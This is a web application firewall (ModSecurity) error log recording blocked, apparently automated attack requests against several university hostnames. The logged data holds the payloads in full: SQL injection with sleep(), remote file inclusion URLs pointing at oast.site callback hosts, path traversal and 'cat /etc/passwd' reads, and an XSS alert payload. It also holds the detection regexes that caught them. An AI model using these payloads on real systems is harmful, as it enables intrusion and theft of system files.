[Tue Aug 29 11:41:59.812541 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAc@cVUAAAAL"]
[Tue Aug 29 11:41:59.813557 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAc92u4AAAAD"]
[Tue Aug 29 11:42:00.377699 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gjo4rf4rg59kwa.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gjo4rf4rg59kwa.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAc36yIAAAAO"]
[Tue Aug 29 11:42:00.378074 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gnq46k4e9jbya7.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gnq46k4e9jbya7.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdUcxwAAAAZ"]
[Tue Aug 29 11:42:00.387535 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g4amig7613yy6j.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26g4amig7613yy6j.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAcoNgIAAAAF"]
[Tue Aug 29 11:42:00.392136 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g5x7f8oe5uja5c.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26g5x7f8oe5uja5c.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdYA@sAAAAe"]
[Tue Aug 29 11:42:00.453747 2023] [:error] [pid 1865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gyo3imp1wxkj1u.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gyo3imp1wxkj1u.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdJqRIAAAAC"]
[Tue Aug 29 11:42:01.359380 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdV7YQAAAAa"]
[Tue Aug 29 11:42:01.360922 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdSZJEAAAAX"]
[Tue Aug 29 11:42:01.382259 2023] [:error] [pid 1865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdJqRMAAAAC"]
[Tue Aug 29 11:42:01.390251 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gqm1i4mcrb4hzg.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gqm1i4mcrb4hzg.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GcCo-f0AAAc-5yEAAAAN"]
[Tue Aug 29 11:42:01.407622 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdUcyAAAAAZ"]
[Tue Aug 29 11:42:01.408192 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdECZcAAAAW"]
[Tue Aug 29 11:42:02.515243 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GsCo-f0AAAdQ3doAAAAV"]
[Tue Aug 29 11:42:04.375257 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdb7g8AAAAb"]
[Tue Aug 29 11:42:04.376898 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdQ3d0AAAAV"]
[Tue Aug 29 11:42:04.384864 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdOeOwAAAAS"]
[Tue Aug 29 11:42:04.385914 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAc92vYAAAAD"]
[Tue Aug 29 11:42:04.396754 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdb7hAAAAAb"]
[Tue Aug 29 11:42:05.419696 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdXIkgAAAAd"]
[Tue Aug 29 11:42:05.420618 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdOeO4AAAAS"]
[Tue Aug 29 11:42:05.424216 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdV7YwAAAAa"]
[Tue Aug 29 11:42:05.430170 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdQ3eAAAAAV"]
[Tue Aug 29 11:42:05.431031 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HcCo-f0AAAc36y0AAAAO"]
[Tue Aug 29 11:42:05.441833 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAc-5y0AAAAN"]
[Tue Aug 29 11:42:06.374477 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HsCo-f0AAAQSWx4AAAA0"]
[Tue Aug 29 11:42:06.422962 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdb7hUAAAAb"]
[Tue Aug 29 11:42:06.475535 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdPLxcAAAAT"]
[Tue Aug 29 11:42:06.476204 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdaZNEAAAAM"]
[Tue Aug 29 11:42:06.479791 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdKXMoAAAAK"]
